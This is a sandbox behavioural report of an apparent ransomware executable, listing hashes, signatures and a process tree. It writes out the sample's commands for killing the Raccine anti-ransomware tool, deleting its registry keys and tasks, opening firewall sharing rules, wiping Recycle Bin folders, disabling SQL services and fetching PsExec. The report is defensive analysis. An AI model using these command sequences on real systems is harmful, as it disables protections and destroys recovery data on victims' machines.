Analysis
-
max time kernel
151s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
29-10-2021 14:41
Static task
static1
Behavioral task
behavioral1
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
Resource
win10-en-20210920
General
-
Target
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
-
Size
368KB
-
MD5
2a6f56addd8adcbb1a6cc8e1d6090012
-
SHA1
03227744a280d56267cbef448f7e54a924f46173
-
SHA256
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554
-
SHA512
63d951d531ac8c9be311a73ab3c70f3b0afe77a71bbc949ede5564bc98de523bc324c926cb9d4a49dd25171f62333e645e4a56d9e2b4cceab3976672a4eba2c0
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 13 http://live.sysinternals.com/PsExec64.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exepid process 1080 icacls.exe 2808 icacls.exe 4448 icacls.exe 5340 icacls.exe -
Processes:
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание внимание внимание!!!" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам." 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 57 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2224 taskkill.exe 2260 taskkill.exe 4668 taskkill.exe 3860 taskkill.exe 3864 taskkill.exe 2172 taskkill.exe 5104 taskkill.exe 4940 taskkill.exe 4408 taskkill.exe 1584 taskkill.exe 5040 taskkill.exe 4968 taskkill.exe 2512 taskkill.exe 2528 taskkill.exe 2672 taskkill.exe 908 taskkill.exe 2112 taskkill.exe 4416 taskkill.exe 2504 taskkill.exe 2544 taskkill.exe 2476 taskkill.exe 1096 taskkill.exe 696 taskkill.exe 2564 taskkill.exe 3052 taskkill.exe 2316 taskkill.exe 1584 taskkill.exe 1072 taskkill.exe 1656 taskkill.exe 2688 taskkill.exe 3720 taskkill.exe 5036 taskkill.exe 2076 taskkill.exe 3892 taskkill.exe 5500 taskkill.exe 3692 taskkill.exe 440 taskkill.exe 4412 taskkill.exe 1264 taskkill.exe 2104 taskkill.exe 2592 taskkill.exe 4884 taskkill.exe 2308 taskkill.exe 1744 taskkill.exe 2428 taskkill.exe 3624 taskkill.exe 2416 taskkill.exe 5668 taskkill.exe 5616 taskkill.exe 5624 taskkill.exe 5588 taskkill.exe 2396 taskkill.exe 1600 taskkill.exe 2292 taskkill.exe 2468 taskkill.exe 5728 taskkill.exe 5524 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exepid process 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe -
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes:
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 5616 taskkill.exe Token: SeDebugPrivilege 4416 taskkill.exe Token: SeDebugPrivilege 5624 taskkill.exe Token: SeDebugPrivilege 4412 taskkill.exe Token: SeDebugPrivilege 2112 taskkill.exe Token: SeDebugPrivilege 3892 taskkill.exe Token: SeDebugPrivilege 5500 taskkill.exe Token: SeDebugPrivilege 2468 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 5668 taskkill.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeDebugPrivilege 2564 taskkill.exe Token: SeDebugPrivilege 3864 taskkill.exe Token: SeDebugPrivilege 2512 taskkill.exe Token: SeDebugPrivilege 2172 taskkill.exe Token: SeDebugPrivilege 908 taskkill.exe Token: SeDebugPrivilege 2688 taskkill.exe Token: SeDebugPrivilege 2592 taskkill.exe Token: SeDebugPrivilege 5040 taskkill.exe Token: SeDebugPrivilege 3052 taskkill.exe Token: SeDebugPrivilege 4940 taskkill.exe Token: SeDebugPrivilege 2504 taskkill.exe Token: SeDebugPrivilege 4668 taskkill.exe Token: SeDebugPrivilege 2428 taskkill.exe Token: SeDebugPrivilege 2528 taskkill.exe Token: SeDebugPrivilege 2076 taskkill.exe Token: SeDebugPrivilege 2544 taskkill.exe Token: SeDebugPrivilege 4884 taskkill.exe Token: SeDebugPrivilege 2672 taskkill.exe Token: SeDebugPrivilege 2260 taskkill.exe Token: SeDebugPrivilege 3720 taskkill.exe Token: SeDebugPrivilege 3860 taskkill.exe Token: SeDebugPrivilege 440 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 2476 taskkill.exe Token: SeDebugPrivilege 4968 taskkill.exe Token: SeDebugPrivilege 1264 taskkill.exe Token: SeDebugPrivilege 696 taskkill.exe Token: SeDebugPrivilege 2396 taskkill.exe Token: SeDebugPrivilege 3692 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 1096 taskkill.exe Token: SeDebugPrivilege 3624 taskkill.exe Token: SeDebugPrivilege 5728 taskkill.exe Token: SeDebugPrivilege 4408 taskkill.exe Token: SeDebugPrivilege 2292 taskkill.exe Token: SeDebugPrivilege 5524 taskkill.exe Token: SeDebugPrivilege 5104 taskkill.exe Token: SeDebugPrivilege 2416 taskkill.exe Token: SeDebugPrivilege 5588 taskkill.exe Token: SeDebugPrivilege 2224 taskkill.exe Token: SeDebugPrivilege 1744 taskkill.exe Token: SeDebugPrivilege 2308 taskkill.exe Token: SeDebugPrivilege 5036 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 1072 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exedescription pid process target process PID 980 wrote to memory of 1976 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe powershell.exe PID 980 wrote to memory of 1976 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe powershell.exe PID 980 wrote to memory of 1976 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe powershell.exe PID 980 wrote to memory of 1584 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe taskkill.exe PID 980 wrote to memory of 1584 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe taskkill.exe PID 980 wrote to memory of 1584 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe taskkill.exe PID 980 wrote to memory of 1012 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe reg.exe PID 980 wrote to memory of 1012 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe reg.exe PID 980 wrote to memory of 1012 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe reg.exe PID 980 wrote to memory of 1400 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe reg.exe PID 980 wrote to memory of 1400 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe reg.exe PID 980 wrote to memory of 1400 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe reg.exe PID 980 wrote to memory of 1952 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe schtasks.exe PID 980 wrote to memory of 1952 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe schtasks.exe PID 980 wrote to memory of 1952 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe schtasks.exe PID 980 wrote to memory of 1964 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe cmd.exe PID 980 wrote to memory of 1964 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe cmd.exe PID 980 wrote to memory of 1964 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe cmd.exe PID 980 wrote to memory of 1768 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe cmd.exe PID 980 wrote to memory of 1768 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe cmd.exe PID 980 wrote to memory of 1768 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe cmd.exe PID 980 wrote to memory of 1772 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe netsh.exe PID 980 wrote to memory of 1772 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe netsh.exe PID 980 wrote to memory of 1772 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe netsh.exe PID 980 wrote to memory of 2032 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe netsh.exe PID 980 wrote to memory of 2032 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe netsh.exe PID 980 wrote to memory of 2032 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe netsh.exe PID 980 wrote to memory of 1256 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1256 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1256 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 628 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 628 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 628 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1176 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1176 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1176 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 912 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 912 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 912 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1000 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1000 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1000 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 776 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 776 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 776 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1536 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1536 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1536 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 556 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 556 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 556 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe sc.exe PID 980 wrote to memory of 1664 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1664 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1664 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1644 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1644 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1644 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1348 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1348 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1348 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 936 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 936 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 936 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe PID 980 wrote to memory of 1692 980 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe net.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание внимание внимание!!!" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам." 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:1012
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1400
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1952
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1772
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:2032
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:1768
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1964
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1256
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:628
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1176
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:912
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1000
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:776
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:1536
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:556
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y2⤵PID:1664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵PID:1172
-
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y2⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵PID:3548
-
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y2⤵PID:1348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:1728
-
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y2⤵PID:936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:3684
-
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y2⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:3628
-
